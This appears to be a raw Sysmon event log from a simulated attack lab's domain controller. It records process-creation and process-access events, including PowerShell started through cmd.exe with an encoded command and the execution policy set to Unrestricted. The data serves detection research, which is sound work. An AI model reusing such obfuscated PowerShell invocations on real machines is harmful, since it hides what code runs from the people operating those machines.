+949f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+954a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+94a12e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67
958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949e82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4814(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4407(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f4130(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949f3e01(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+954a5466(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949dac62(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f1f67958bde80ba63cbbc17c9cbeaa40\System.Management.Automation.ni.dll+949da232(wow64) 154100x8000000000000000226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.616{59A5CD1D-8E1D-6005-C602-00000000A201}3676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 
JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E1D-6005-C64B-100000000000}0x104bc60HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E1D-6005-C502-00000000A201}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 10341000x8000000000000000225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.559{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E1D-6005-C502-00000000A201}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.559{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8E1D-6005-C502-00000000A201}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x8000000000000000223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.528{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.528{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.528{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
11241100x8000000000000000220Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.512{59A5CD1D-8E1D-6005-C502-00000000A201}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_3dysobch.jsz.ps12021-01-18 13:33:17.512 10341000x8000000000000000219Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.512{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E1D-6005-C502-00000000A201}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.481{59A5CD1D-8E1D-6005-C302-00000000A201}48324960C:\Windows\system32\conhost.exe{59A5CD1D-8E1D-6005-C502-00000000A201}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000216Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000212Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000211Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000210Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.481{59A5CD1D-8C95-6005-0500-00000000A201}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E1D-6005-C502-00000000A201}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.481{59A5CD1D-8E1D-6005-C402-00000000A201}32884320C:\Windows\system32\cmd.exe{59A5CD1D-8E1D-6005-C502-00000000A201}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
154100x8000000000000000206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.482{59A5CD1D-8E1D-6005-C502-00000000A201}2256C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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C:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E1D-6005-C64B-100000000000}0x104bc60HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E1D-6005-C402-00000000A201}3288C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 10341000x8000000000000000205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:17.466{59A5CD1D-8E1D-6005-C302-00000000A201}48324960C:\Windows\system32\conhost.exe{59A5CD1D-8E1D-6005-C402-00000000A201}3288C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:17.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 